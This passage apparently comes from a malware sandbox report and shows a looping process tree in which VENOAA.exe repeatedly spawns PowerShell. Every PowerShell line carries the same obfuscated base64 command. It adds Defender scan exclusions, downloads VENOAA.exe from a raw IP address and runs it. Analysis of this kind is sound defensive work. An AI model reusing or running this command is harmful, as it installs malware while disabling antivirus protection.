        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        186⤵
        
        PID:3956
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        187⤵
        
        PID:996
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        188⤵
        
        PID:3608
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        189⤵
        Checks computer location settings
        
        PID:4104
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        190⤵
        
        PID:4040
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        191⤵
        
        PID:2844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        192⤵
        
        PID:4544
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        193⤵
        
        PID:4004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        194⤵
        
        PID:4060
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        195⤵
        Checks computer location settings
        
        PID:552
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        196⤵
        
        PID:636
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        197⤵
        Checks computer location settings
        
        PID:3392
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        198⤵
        
        PID:3964
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        199⤵
        Checks computer location settings
        
        PID:2784
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        200⤵
        
        PID:3440
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        201⤵
        
        PID:748
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        202⤵
        
        PID:4368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        203⤵
        
        PID:4104
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        203⤵
        Checks computer location settings
        
        PID:4188
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        204⤵
        
        PID:4020
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        205⤵
        
        PID:3980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        206⤵
        
        PID:5064
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        207⤵
        
        PID:2588
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        207⤵
        Checks computer location settings
        
        PID:3224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        208⤵
        
        PID:2616
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        209⤵
        Checks computer location settings
        
        PID:1364
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        210⤵
        
        PID:4332
        
        C:\Users\Admin\AppData\Local\Temp\VENOAA.exe
        
        "C:\Users\Admin\AppData\Local\Temp\VENOAA.exe"
        211⤵
        
        PID:732
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
